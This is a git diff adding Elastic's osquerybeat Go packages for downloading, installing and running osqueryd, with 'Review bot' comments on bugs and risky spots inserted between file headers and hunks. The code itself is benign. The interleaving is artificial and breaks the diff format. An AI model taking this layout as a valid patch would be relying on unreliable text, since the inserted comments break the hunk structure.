Qmia6yJzl4XWOQglqCeYFO6dtxD4ntGcTpg2iOU2UQzWjWkwnrD9NXxhPrZs5jGABuklNIXO7grDP87e4xOWvQhPWpATAJljFZAgz0QroEwzCW3IfJbLpIj18oSEuCK/d+0wRqH3uN037aPZpTLtK+WLvq0HM288MHWQdbzkzPiuvyr26Ae84B3FhItmOIo8fdzsHz+ck7G8w1AXnM5yK0ByH9HjIp+5z6oatHNm/W3MYBuU+N1R5VncGv+00GMmtC+okhMhtbfppPq9YPnU3l9Zafau8mU4eSBs/lcAAAD//64/G38=" +} diff --git a/x-pack/osquerybeat/include/include.go b/x-pack/osquerybeat/include/include.go new file mode 100644 index 00000000000..f890a7386da --- /dev/null +++ b/x-pack/osquerybeat/include/include.go @@ -0,0 +1,5 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package include 
diff --git a/x-pack/osquerybeat/internal/command/command.go b/x-pack/osquerybeat/internal/command/command.go
new file mode 100644
index 00000000000..1c8669e0946
--- /dev/null
+++ b/x-pack/osquerybeat/internal/command/command.go
@@ -0,0 +1,72 @@
+// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+// or more contributor license agreements. Licensed under the Elastic License;
+// you may not use this file except in compliance with the Elastic License.
+
+package command
+
+import (
+ "context"
+ "fmt"
+ "io"
+ "os/exec"
+ "strings"
+)
+
+func Execute(ctx context.Context, name string, arg ...string) (out string, err error) {
+ cmd := exec.Command(name, arg...)
+ stdout, err := cmd.StdoutPipe()
+ if err != nil {
+ return
+ }
+
+ stderr, err := cmd.StderrPipe()
+ if err != nil {
+ return
+ }
+
+ err = cmd.Start()
+ if err != nil {
+ return
+ }
+
+ var (
+ outbuf strings.Builder
+ errbuf strings.Builder
+ )
+
+ finished := make(chan error, 1)
+
+ wait := func() error {
+ _, err := io.Copy(&outbuf, stdout)
+ if err != nil {
+ return err
+ }
+
+ _, err = io.Copy(&errbuf, stderr)
+ if err != nil {
+ return err
+ }
+ return cmd.Wait()
+ }
+
+ go func() {
+ finished <- wait()
+ }()
+
+ // Wait either on process finish or context cancel
+ select {
+ case err = <-finished:
+ if err != nil {
+ s := strings.TrimSpace(errbuf.String())
+ if s == "" {
+ return
+ }
+ return "", fmt.Errorf("%s: %w", s, err)
+ }
+ case <-ctx.Done():
+ cmd.Process.Kill()
+ err = ctx.Err()
+ }
+
+ return outbuf.String(), nil
+}
diff --git a/x-pack/osquerybeat/internal/config/config.go b/x-pack/osquerybeat/internal/config/config.go
new file mode 100644
index 00000000000..f25f23a0407
--- /dev/null
+++ b/x-pack/osquerybeat/internal/config/config.go
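Review bot: The cancellation branch of `Execute` in command.go sets `err = ctx.Err()`, but the function then falls through to `return outbuf.String(), nil`, so a cancelled or timed-out command is reported to the caller as success. That branch also reads `outbuf` while the goroutine running `wait` may still be writing to it, and it never waits for the killed process. I would end the branch with `cmd.Process.Kill()`, `<-finished`, `return "", ctx.Err()`. Separately, `wait` drains stdout to EOF before it reads stderr, so a child that fills the stderr pipe first can stall; copying the two streams concurrently, or assigning buffers to `cmd.Stdout` and `cmd.Stderr`, avoids that.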
@@ -0,0 +1,68 @@
+// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+// or more contributor license agreements. Licensed under the Elastic License;
+// you may not use this file except in compliance with the Elastic License.
+
+// Config is put into a different package to prevent cyclic imports in case
+// it is needed in several locations
+
+package config
+
+import (
+ "time"
+)
+
+// Default index name for ad-hoc queries, since the dataset is defined at the stream level, for example:
+// streams:
+// - id: '123456'
+// data_stream:
+// dataset: osquery_manager.result
+// type: logs
+// query: select * from usb_devices
+
+const DefaultStreamIndex = "logs-osquery_manager.result-default"
+
+type StreamConfig struct {
+ ID string `config:"id"`
+ Query string `config:"query"`
+ Interval time.Duration `config:"interval"`
+ Index string `config:"index"` // ES output index pattern
+}
+
+type InputConfig struct {
+ Type string `config:"type"`
+ Streams []StreamConfig `config:"streams"`
+}
+
+type Config struct {
+ Inputs []InputConfig `config:"inputs"`
+}
+
+type void struct{}
+type inputTypeSet map[string]void
+
+var none = void{}
+
+var DefaultConfig = Config{}
+
+func StreamsFromInputs(inputs []InputConfig) ([]StreamConfig, []string) {
+ var (
+ streams []StreamConfig
+ )
+
+ typeSet := make(inputTypeSet, 1)
+ for _, input := range inputs {
+ typeSet[input.Type] = none
+ for _, s := range input.Streams {
+ if s.Index == "" {
+ s.Index = DefaultStreamIndex
+ }
+ streams = append(streams, s)
+ }
+ }
+
+ var inputTypes []string
+ for t := range typeSet {
+ inputTypes = append(inputTypes, t)
+ }
+ return streams, inputTypes
+}
diff --git a/x-pack/osquerybeat/internal/config/config_test.go b/x-pack/osquerybeat/internal/config/config_test.go
new file mode 100644
index 00000000000..6197c99ade2
--- /dev/null
+++ b/x-pack/osquerybeat/internal/config/config_test.go
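Review bot: `StreamsFromInputs` in config.go fills `inputTypes` by ranging over a map, so the order of the returned types differs from call to call. If any caller logs, compares or hashes that slice, add `sort.Strings(inputTypes)` before the return, which needs the `sort` import. The exported `StreamConfig`, `InputConfig`, `Config` and `StreamsFromInputs` also lack doc comments; for the function, `// StreamsFromInputs flattens the streams of all inputs, sets DefaultStreamIndex on streams without an index, and returns the distinct input types.` would do.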
@@ -0,0 +1,7 @@
+// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+// or more contributor license agreements. Licensed under the Elastic License;
+// you may not use this file except in compliance with the Elastic License.
+
+// +build !integration
+
+package config
diff --git a/x-pack/osquerybeat/internal/config/watcher.go b/x-pack/osquerybeat/internal/config/watcher.go
new file mode 100644
index 00000000000..fcade5ad65b
--- /dev/null
+++ b/x-pack/osquerybeat/internal/config/watcher.go
@@ -0,0 +1,47 @@
+// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+// or more contributor license agreements. Licensed under the Elastic License;
+// you may not use this file except in compliance with the Elastic License.
+
+package config
+
+import (
+ "context"
+
+ "github.com/elastic/beats/v7/libbeat/common/reload"
+)
+
+type reloader struct {
+ ctx context.Context
+ ch chan<- []InputConfig
+}
+
+func (r *reloader) Reload(configs []*reload.ConfigWithMeta) error {
+ var inputConfigs []InputConfig
+ for _, cfg := range configs {
+ var icfg InputConfig
+ err := cfg.Config.Unpack(&icfg)
+ if err != nil {
+ return err
+ }
+ inputConfigs = append(inputConfigs, icfg)
+ }
+
+ select {
+ case <-r.ctx.Done():
+ default:
+ r.ch <- inputConfigs
+ }
+
+ return nil
+}
+
+func WatchInputs(ctx context.Context) <-chan []InputConfig {
+ ch := make(chan []InputConfig)
+ r := &reloader{
+ ctx: ctx,
+ ch: ch,
+ }
+ reload.Register.MustRegisterList("inputs", r)
+
+ return ch
+}
diff --git a/x-pack/osquerybeat/internal/distro/distro.go b/x-pack/osquerybeat/internal/distro/distro.go
new file mode 100644
index 00000000000..7c6b8ac80be
--- /dev/null
+++ b/x-pack/osquerybeat/internal/distro/distro.go
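Review bot: In `reloader.Reload` (watcher.go) the send on `r.ch` sits in the `default` arm of the `select`, so it is a plain blocking send on the unbuffered channel created in `WatchInputs`. If the context is cancelled just after the check, or the consumer has stopped receiving, `Reload` never returns and holds up whoever called it. Make the send one of the select cases instead: `select { case <-r.ctx.Done(): case r.ch <- inputConfigs: }`.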
@@ -0,0 +1,115 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package distro + +import ( + "errors" + "fmt" + "os" + "path/filepath" + "runtime" +) + +var ( + ErrUnsupportedOS = errors.New("unsupported OS") +) + +var ( + DataDir = filepath.Clean("build/data") + DataInstallDir = filepath.Join(DataDir, "install") + DataCacheDir = filepath.Join(DataDir, "cache") +) + +const ( + osqueryDownloadBaseURL = "https://pkg.osquery.io" + osqueryName = "osquery" + osqueryDName = "osqueryd" + osqueryPath = "usr/local/bin" + osqueryVersion = "4.7.0" + osqueryMSIExt = ".msi" + osqueryPkgExt = ".pkg" + + osqueryDistroDarwinSHA256 = "31244705a497f7b33eaee6b4995cea9a4b55a3b9b0f20ea4bab400ff8798cbb4" + osqueryDistroLinuxSHA256 = "2086b1e2bf47b25a5eb64e35d516f222b2bd1c50610a71916ebb29af9d0ec210" + osqueryDistroWindowsSHA256 = "54a98345e7f5ad6819f5516e7f340795cf42b83f4fda221c4a10bfd83f803758" +) + +func OsquerydVersion() string { + return osqueryVersion +} + +func OsquerydFilename() string { + if runtime.GOOS == "windows" { + return osqueryDName + ".exe" + } + return osqueryDName +} + +func OsquerydPath(dir string) string { + return filepath.Join(dir, OsquerydFilename()) +} + +func OsquerydDistroPath() string { + return OsquerydPath(osqueryPath) +} + +func OsquerydDistroFilename() string { + return OsquerydDistroPlatformFilename(runtime.GOOS) +} + +func OsquerydDistroPlatformFilename(platform string) string { + switch platform { + case "windows": + return osqueryName + "-" + osqueryVersion + osqueryMSIExt + case "darwin": + return osqueryName + "-" + osqueryVersion + osqueryPkgExt + } + return OsquerydFilename() +} + +type Spec struct { + PackSuffix string + SHA256Hash string + Extract bool +} + +func (s Spec) DistroFilename() string { + return osqueryName + "-" + osqueryVersion + s.PackSuffix 
+} + +func (s Spec) DistroFilepath(dir string) string { + return filepath.Join(dir, s.DistroFilename()) +} + +func (s Spec) InstalledFilename() string { + if s.Extract { + return osqueryDName + } + return s.DistroFilename() +} + +func (s Spec) InstalledMode() os.FileMode { + if s.Extract { + return 0755 + } + return 0644 +} + +func (s Spec) URL(osname string) string { + return osqueryDownloadBaseURL + "/" + osname + "/" + s.DistroFilename() +} + +var specs = map[string]Spec{ + "linux": {"_1.linux_x86_64.tar.gz", osqueryDistroLinuxSHA256, true}, + "darwin": {osqueryPkgExt, osqueryDistroDarwinSHA256, false}, + "windows": {osqueryMSIExt, osqueryDistroWindowsSHA256, false}, +} + +func GetSpec(osname string) (spec Spec, err error) { + if spec, ok := specs[osname]; ok { + return spec, nil + } + return spec, fmt.Errorf("%s: %w", osname, ErrUnsupportedOS) +} diff --git a/x-pack/osquerybeat/internal/fetch/fetch.go b/x-pack/osquerybeat/internal/fetch/fetch.go new file mode 100644 index 00000000000..4de7bc326b8 --- /dev/null +++ b/x-pack/osquerybeat/internal/fetch/fetch.go 
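Review bot: `OsquerydDistroPlatformFilename` in distro.go falls back to `OsquerydFilename()` for any platform other than windows and darwin, and that helper consults `runtime.GOOS` rather than the `platform` argument, so a request for `"linux"` made on a Windows host yields `osqueryd.exe`. Returning `osqueryDName` in the fallback keeps the result a function of the argument only. The three `osqueryDistro*SHA256` constants protect the download only if the caller compares them with the hash of the fetched file; that comparison is not in this hunk. A comment on the constants naming the package file and version each one pins would make a later `osqueryVersion` bump harder to get wrong.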
@@ -0,0 +1,48 @@
+// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+// or more contributor license agreements. Licensed under the Elastic License;
+// you may not use this file except in compliance with the Elastic License.
+
+package fetch
+
+import (
+ "fmt"
+ "io/ioutil"
+ "log"
+ "net/http"
+ "os"
+
+ "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/hash"
+)
+
+func Download(url, fp string) (hashout string, err error) {
+ log.Printf("Download %s to %s", url, fp)
+
+ cli := http.Client{}
+
+ res, err := cli.Get(url)
+ if err != nil {
+ return
+ }
+ defer res.Body.Close()
+
+ if res.StatusCode != http.StatusOK {
+ // Read body for extended error message
+ b, err := ioutil.ReadAll(res.Body)
+ var s string
+ if err != nil {
+ log.Printf("Failed to read the error response body: %v", err)
+ } else {
+ s = string(b)
+ }
+ return hashout, fmt.Errorf("failed fetch %s, status: %d, message: %s", url, res.StatusCode, s)
+ }
+
+ out, err := os.OpenFile(fp, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0666)
+ if err != nil {
+ return
+ }
+ defer out.Close()
+
+ // Calculate hash and write file
+ return hash.Calculate(res.Body, out)
+}
diff --git a/x-pack/osquerybeat/internal/fileutil/fileutil.go b/x-pack/osquerybeat/internal/fileutil/fileutil.go
new file mode 100644
index 00000000000..62c02f54858
--- /dev/null
+++ b/x-pack/osquerybeat/internal/fileutil/fileutil.go
@@ -0,0 +1,16 @@
+// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+// or more contributor license agreements. Licensed under the Elastic License;
+// you may not use this file except in compliance with the Elastic License.
+
+package fileutil
+
+import "os"
+
+func FileExists(fp string) (ok bool, err error) {
+ if _, err = os.Stat(fp); err == nil {
+ ok = true
+ } else if os.IsNotExist(err) {
+ err = nil
+ }
+ return
+}
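Review bot: `Download` in fetch.go creates `http.Client{}` with no timeout, so a stalled server blocks the caller indefinitely; set `Timeout` on the client to a value that fits the package size. On a non-200 status the whole response body is read with `ioutil.ReadAll` and copied into the error text; reading through `io.LimitReader(res.Body, 4096)` (the limit is an example, and it needs the `io` import) keeps an unexpected response from filling memory or the log. The file is written to its final path with mode `0666` before the returned hash has been checked, so the caller has to compare it with the pinned SHA256 and delete the file on mismatch; that caller is not in this hunk. The deferred `out.Close()` also drops a write error that only surfaces on close.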
diff --git a/x-pack/osquerybeat/internal/hash/hash.go b/x-pack/osquerybeat/internal/hash/hash.go
new file mode 100644
index 00000000000..e9338e27b68
--- /dev/null
+++ b/x-pack/osquerybeat/internal/hash/hash.go
@@ -0,0 +1,28 @@
+// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+// or more contributor license agreements. Licensed under the Elastic License;
+// you may not use this file except in compliance with the Elastic License.
+
+package hash
+
+import (
+ "crypto/sha256"
+ "encoding/hex"
+ "io"
+)
+
+// Calculate hash with optional writer to compbine, useful when streaming data to the disk
+func Calculate(r io.Reader, w io.Writer) (string, error) {
+ h := sha256.New()
+
+ if w != nil {
+ w = io.MultiWriter(h, w)
+ } else {
+ w = h
+ }
+
+ if _, err := io.Copy(w, r); err != nil {
+ return "", err
+ }
+
+ return hex.EncodeToString(h.Sum(nil)), nil
+}
diff --git a/x-pack/osquerybeat/internal/install/install.go b/x-pack/osquerybeat/internal/install/install.go
new file mode 100644
index 00000000000..6a4eca1493f
--- /dev/null
+++ b/x-pack/osquerybeat/internal/install/install.go
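Review bot: The doc comment on `Calculate` in hash.go has a typo (`compbine`) and does not say which digest is computed or in what form it is returned. I would replace it with `// Calculate returns the hex-encoded SHA-256 of everything read from r; when w is non-nil the same bytes are also written to w.` That makes it clear to callers that a non-nil `w` has already received the data by the time the hash can be checked.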
@@ -0,0 +1,95 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package install + +import ( + "context" + "fmt" + "os" + "os/exec" + "path" + "path/filepath" + "runtime" + + "github.com/gofrs/uuid" + + devtools "github.com/elastic/beats/v7/dev-tools/mage" + + "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/command" + "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/distro" + "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/fileutil" +) + +func InstallFromPkg(ctx context.Context, srcPkg, dstDir string, force bool) error { + dstfp := filepath.Join(dstDir, distro.OsquerydFilename()) + + dir, err := installFromCommon(ctx, srcPkg, dstDir, dstfp, force, "pkgutil", "--expand-full", srcPkg) + // Remove the directory that was created could have been created by pkgutil + // In case if the process was killed or finished with error but still left a directory behind + defer os.RemoveAll(dir) + + if err != nil { + return err + } + + // Copy over the osqueryd from under Payload into the dstDir directory + return devtools.Copy(path.Join(dir, "Payload", distro.OsquerydDistroPath()), dstfp) +} + +func InstallFromMSI(ctx context.Context, srcMSI, dstDir string, force bool) error { + dstfp := filepath.Join(dstDir, distro.OsquerydFilename()) + + // Winderz is odd, passing params to msiexec as usual didn't work + dir, err := installFromCommon(ctx, srcMSI, dstDir, dstfp, force, "msiexec", `/quiet /a "`+srcMSI+`"`) + + // Remove the directory that was created could have been created by msiexec + // In case if the process was killed or finished with error but still left a directory behind + defer os.RemoveAll(dir) + + if err != nil { + return err + } + + // Copy over the osqueryd from under osquery/osqueryd into the dstDir directory + return devtools.Copy(path.Join(dir, 
"osquery", distro.OsquerydPath("osqueryd")), dstfp) +} + +func installFromCommon(ctx context.Context, srcfp, dstDir, dstfp string, force bool, name string, arg ...string) (dir string, err error) { + if !force { + //check if files exists + exists, err := fileutil.FileExists(dstfp) + if err != nil { + return dir, err + } + if exists { + return dir, nil + } + } + + if err := os.MkdirAll(dstDir, 0750); err != nil { + return dir, fmt.Errorf("failed to create dir %v, %w", dstDir, err) + } + + // Temp directory for extracting the .pkg or .msi + uid := uuid.Must(uuid.NewV4()).String() + dir = filepath.Join(dstDir, uid) + + if runtime.GOOS == "darwin" { + arg = append(arg, dir) + // Extract .pkg + _, err = command.Execute(ctx, name, arg...) + return dir, err + } + + // Extract .msi + idx := len(arg) - 1 + arg[idx] = arg[idx] + ` TARGETDIR="` + dir + `"` + cmd := exec.Command(name) + + // Set directly to avoid args escaping + setCommandArg(cmd, arg[idx]) + + return dir, cmd.Run() +} diff --git a/x-pack/osquerybeat/internal/install/install_unix.go b/x-pack/osquerybeat/internal/install/install_unix.go new file mode 100644 index 00000000000..6a16368540b --- /dev/null +++ b/x-pack/osquerybeat/internal/install/install_unix.go @@ -0,0 +1,13 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +//+build !windows + +package install + +import "os/exec" + +func setCommandArg(cmd *exec.Cmd, arg string) { + // Noop in *nix +} diff --git a/x-pack/osquerybeat/internal/install/install_windows.go b/x-pack/osquerybeat/internal/install/install_windows.go new file mode 100644 index 00000000000..b28608e7e92 --- /dev/null +++ b/x-pack/osquerybeat/internal/install/install_windows.go 
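Review bot: When `force` is false and the destination already exists, `installFromCommon` in install.go returns an empty `dir` with a nil error, yet `InstallFromPkg` and `InstallFromMSI` still call `devtools.Copy(path.Join(dir, ...), dstfp)`, which then copies from a path relative to the working directory. Return early in both callers after the error check, `if dir == "" { return nil }`. The `.msi` branch builds its process with `exec.Command(name)` and `cmd.Run()`, so `ctx` is ignored there, and that branch is taken for every OS other than darwin; `exec.CommandContext(ctx, name)` would at least honour cancellation. `srcMSI` and `dir` are spliced into a quoted command-line string, so a `"` in either path changes how msiexec parses it; a comment should state that both must come from trusted build configuration.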
@@ -0,0 +1,22 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +//+build windows + +package install + +import ( + "os/exec" + "syscall" +) + +func setCommandArg(cmd *exec.Cmd, arg string) { + // Winders hack to pass args to msiexec without escaping + // Set directly to avoid args escaping + cmd.SysProcAttr = &syscall.SysProcAttr{ + CmdLine: " " + arg, + HideWindow: false, + CreationFlags: 0, + } +} diff --git a/x-pack/osquerybeat/internal/osqueryd/client.go b/x-pack/osquerybeat/internal/osqueryd/client.go new file mode 100644 index 00000000000..f282cd6ddbd --- /dev/null +++ b/x-pack/osquerybeat/internal/osqueryd/client.go 
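Review bot: `setCommandArg` in install_windows.go passes `arg` to the child as a raw `CmdLine`, so none of Go's argument quoting applies and every quote in the string is the caller's responsibility; the comment should spell that out. I would write `// setCommandArg sets the raw Windows command line for cmd; arg must already be quoted correctly and must not contain untrusted text.` `HideWindow: false` and `CreationFlags: 0` are zero values and can be dropped.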
@@ -0,0 +1,95 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package osqueryd + +import ( + "context" + "errors" + "fmt" + "time" + + "github.com/elastic/beats/v7/libbeat/logp" + + "github.com/kolide/osquery-go" +) + +const ( + DefaultTimeout = 30 * time.Second + + retryWait = 200 * time.Millisecond + retryTimes = 10 + logTag = "osqueryd_cli" +) + +type Client struct { + cli *osquery.ExtensionManagerClient +} + +func NewClient(ctx context.Context, socketPath string, to time.Duration) (*Client, error) { + cli, err := newClientWithRetries(ctx, socketPath, to) + if err != nil { + return nil, err + } + return &Client{ + cli: cli, + }, nil +} + +func newClientWithRetries(ctx context.Context, socketPath string, to time.Duration) (cli *osquery.ExtensionManagerClient, err error) { + log := logp.NewLogger(logTag).With("socket_path", socketPath) + for i := 0; i < retryTimes; i++ { + attempt := i + 1 + llog := log.With("attempt", attempt) + llog.Debug("Connecting") + cli, err = osquery.NewClient(socketPath, to) + if err != nil { + llog.Debug("Failed to connect, err: %v", err) + if i < retryTimes-1 { + llog.Infof("Wait for %v before next connect attempt", retryWait) + if werr := waitWithContext(ctx, retryWait); werr != nil { + err = werr + break // Context cancelled, exit loop + } + } + continue + } + break + } + if err != nil { + log.Error("Failed to connect, err: %v", err) + } else { + log.Info("Connected.") + } + return cli, err +} + +func (c *Client) Close() { + if c.cli != nil { + c.cli.Close() + c.cli = nil + } +} + +func (c *Client) Query(ctx context.Context, sql string) ([]map[string]string, error) { + res, err := c.cli.Client.Query(ctx, sql) + if err != nil { + return nil, fmt.Errorf("osquery failed: %w", err) + } + if res.Status.Code != int32(0) { + return nil, 
errors.New(res.Status.Message) + } + return res.Response, nil +} + +func waitWithContext(ctx context.Context, to time.Duration) error { + t := time.NewTimer(to) + defer t.Stop() + select { + case <-ctx.Done(): + return context.Canceled + case <-t.C: + } + return nil +} diff --git a/x-pack/osquerybeat/internal/osqueryd/osqueryd.go b/x-pack/osquerybeat/internal/osqueryd/osqueryd.go new file mode 100644 index 00000000000..f45bc0dc870 --- /dev/null +++ b/x-pack/osquerybeat/internal/osqueryd/osqueryd.go 
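Review bot: In `newClientWithRetries` (client.go) the calls `llog.Debug("Failed to connect, err: %v", err)` and `log.Error("Failed to connect, err: %v", err)` use the non-formatting logger methods, so `%v` is printed literally and the error is only appended; they should be `Debugf` and `Errorf`, as `Infof` is already used a few lines below. `waitWithContext` returns `context.Canceled` even when the context ended on its deadline; `return ctx.Err()` reports the real cause. `Query` dereferences `c.cli` without a nil check although `Close` sets it to nil, so a query after close panics instead of returning an error.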
@@ -0,0 +1,126 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package osqueryd + +import ( + "context" + "fmt" + "io" + "os" + "os/exec" + "path" + "path/filepath" + "strings" + + "github.com/elastic/beats/v7/libbeat/logp" + "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/distro" +) + +// The subdirectory to hold .pid, .db, .sock and other work file for osqueryd sub process. Open for discussion. +// Will see later what needs to be parameterized and what not. +const ( + osquerySubdir = "osquery" + extensionsTimeout = 10 +) + +type OsqueryD struct { + RootDir string + SocketPath string +} + +// TODO(AM): finalize what to do with config file, how much of the config file we need etc. Open question for now. +func (q *OsqueryD) Start(ctx context.Context) (<-chan error, error) { + log := logp.NewLogger("osqueryd").With("dir", q.RootDir).With("socket_path", q.SocketPath) + log.Info("Starting process") + + dir := filepath.Join(q.RootDir, osquerySubdir) + + if err := os.MkdirAll(dir, 0700); err != nil { + return nil, fmt.Errorf("failed to create dir %v, %w", dir, err) + } + + cmd := q.createCommand(log, dir) + + cmd.SysProcAttr = setpgid() + + stderr, err := cmd.StderrPipe() + if err != nil { + return nil, err + } + + err = cmd.Start() + if err != nil { + return nil, err + } + + var ( + errbuf strings.Builder + ) + + wait := func() error { + if _, cerr := io.Copy(&errbuf, stderr); cerr != nil { + return cerr + } + return cmd.Wait() + } + + finished := make(chan error, 1) + + go func() { + finished <- wait() + }() + + done := make(chan error, 1) + go func() { + var ferr error + select { + case ferr = <-finished: + if ferr != nil { + s := strings.TrimSpace(errbuf.String()) + if s != "" { + ferr = fmt.Errorf("%s: %w", s, ferr) + } + } + if ferr != nil { + log.Errorf("Process 
exited with error: %v", ferr) + } else { + log.Info("Process exited") + } + case <-ctx.Done(): + log.Info("Kill process group on context done") + killProcessGroup(cmd) + // Wait till finished + <-finished + ferr = ctx.Err() + } + done <- ferr + }() + + return done, err +} + +func (q *OsqueryD) createCommand(log *logp.Logger, dir string) *exec.Cmd { + + cmd := exec.Command( + distro.OsquerydPath(q.RootDir), + "--force=true", + "--disable_watchdog", + "--utc", + "--pidfile="+path.Join(dir, "osquery.pid"), + "--database_path="+path.Join(dir, "osquery.db"), + "--extensions_socket="+q.SocketPath, + "--config_path="+path.Join(dir, "osquery.conf"), + "--logger_path="+dir, + "--extensions_autoload="+path.Join(dir, "osquery.autoload"), + fmt.Sprint("--extensions_timeout=", extensionsTimeout), + ) + + cmd.Args = append(cmd.Args, platformArgs()...) + + if log.IsDebug() { + cmd.Args = append(cmd.Args, "--verbose") + } + return cmd +} diff --git a/x-pack/osquerybeat/internal/osqueryd/osqueryd_unix.go b/x-pack/osquerybeat/internal/osqueryd/osqueryd_unix.go new file mode 100644 index 00000000000..18f00603edc --- /dev/null +++ b/x-pack/osquerybeat/internal/osqueryd/osqueryd_unix.go 
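Review bot: `Start` in osqueryd.go copies the child's stderr into a `strings.Builder` for the whole life of the process, and `createCommand` adds `--verbose` when debug logging is on, so for a long-running osqueryd that buffer grows without bound. Keep only a bounded tail of stderr for the exit error, or forward the lines to the logger as they arrive. In the `ctx.Done()` branch the result of `killProcessGroup(cmd)` is discarded; if the kill fails, `<-finished` never returns and the goroutine stays blocked, so the error should at least be logged. The file arguments are built with `path.Join` while `dir` comes from `filepath.Join`; using `filepath.Join` throughout keeps separators consistent on Windows.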
@@ -0,0 +1,34 @@
+// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+// or more contributor license agreements. Licensed under the Elastic License;
+// you may not use this file except in compliance with the Elastic License.
+
+// +build !windows
+
+package osqueryd
+
+import (
+ "os/exec"
+ "path/filepath"
+ "syscall"
+
+ "github.com/pkg/errors"
+)
+
+func SocketPath(dir string) string {
+ return filepath.Join(dir, "osquery.sock")
+}
+
+func platformArgs() []string {
+ return nil
+}
+
+func setpgid() *syscall.SysProcAttr {
+ return &syscall.SysProcAttr{Setpgid: true}
+}
+
+// Borrowed from https://github.com/kolide/launcher/blob/master/pkg/osquery/runtime/runtime_helpers.go#L20
+// For clean process tree kill
+func killProcessGroup(cmd *exec.Cmd) error {
+ err := syscall.Kill(-cmd.Process.Pid, syscall.SIGKILL)
+ return errors.Wrapf(err, "kill process group %d", cmd.Process.Pid)
+}
diff --git a/x-pack/osquerybeat/internal/osqueryd/osqueryd_windows.go b/x-pack/osquerybeat/internal/osqueryd/osqueryd_windows.go
new file mode 100644
index 00000000000..0b7d881f041
--- /dev/null
+++ b/x-pack/osquerybeat/internal/osqueryd/osqueryd_windows.go
@@ -0,0 +1,37 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +// +build windows + +package osqueryd + +import ( + "fmt" + "os/exec" + "syscall" + + "github.com/gofrs/uuid" +) + +func SocketPath(dir string) string { + return `\\.\pipe\elastic\osquery\` + uuid.Must(uuid.NewV4()).String() +} + +func platformArgs() []string { + return []string{ + "--allow_unsafe", + } +} + +func setpgid() *syscall.SysProcAttr { + return &syscall.SysProcAttr{} +} + +// Borrowed from https://github.com/kolide/launcher/blob/master/pkg/osquery/runtime/runtime_helpers_windows.go#L25 +// For clean process tree kill +func killProcessGroup(cmd *exec.Cmd) error { + // https://github.com/golang/dep/pull/857 + exec.Command("taskkill", "/F", "/T", "/PID", fmt.Sprint(cmd.Process.Pid)).Run() + return nil +} diff --git a/x-pack/osquerybeat/internal/tar/tar.go b/x-pack/osquerybeat/internal/tar/tar.go new file mode 100644 index 00000000000..19056bae8b0 --- /dev/null +++ b/x-pack/osquerybeat/internal/tar/tar.go 
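Review bot: `killProcessGroup` in osqueryd_windows.go discards the result of `taskkill` and always returns nil, so a failed kill is invisible to the caller, unlike the Unix variant which reports it. Returning the error directly fixes that: `return exec.Command("taskkill", "/F", "/T", "/PID", fmt.Sprint(cmd.Process.Pid)).Run()`. `platformArgs` adds `--allow_unsafe` unconditionally and without explanation; as far as I know that flag relaxes osquery's permission checks on what it loads, so a comment should say why Windows needs it and what restricts write access to the install directory instead. `SocketPath` ignores its `dir` parameter on this platform, which also deserves a one-line comment.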
@@ -0,0 +1,91 @@
+// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+// or more contributor license agreements. Licensed under the Elastic License;
+// you may not use this file except in compliance with the Elastic License.
+
+package tar
+
+import (
+ "archive/tar"
+ "compress/gzip"
+ "fmt"
+ "io"
+ "os"
+ "path/filepath"
+ "strings"
+)
+
+func shouldExtract(name string, files ...string) bool {
+ if files == nil {
+ return true
+ }
+
+ for _, f := range files {
+ if strings.HasPrefix(f, name) {
+ return true
+ }
+ }
+ return false
+}
+
+func ExtractFile(fp string, destinationDir string, files ...string) error {
+ f, err := os.Open(fp)
+ if err != nil {
+ return err
+ }
+ defer f.Close()
+ zr, err := gzip.NewReader(f)
+ if err != nil {
+ return err
+ }
+
+ return Extract(zr, destinationDir, files...)
+}
+
+func Extract(r io.Reader, destinationDir string, files ...string) error {
+ tarReader := tar.NewReader(r)
+
+ for {
+ header, err := tarReader.Next()
+ if err != nil {
+ if err == io.EOF {
+ break
+ }
+ return err
+ }
+ if !shouldExtract(header.Name, files...) {
+ continue
+ }
+
+ path := filepath.Join(destinationDir, header.Name)
+ if !strings.HasPrefix(path, destinationDir) {
+ return fmt.Errorf("illegal file path in tar: %v", header.Name)
+ }
+
+ switch header.Typeflag {
+ case tar.TypeDir:
+ if err = os.MkdirAll(path, os.FileMode(header.Mode)); err != nil {
+ return err
+ }
+ case tar.TypeReg:
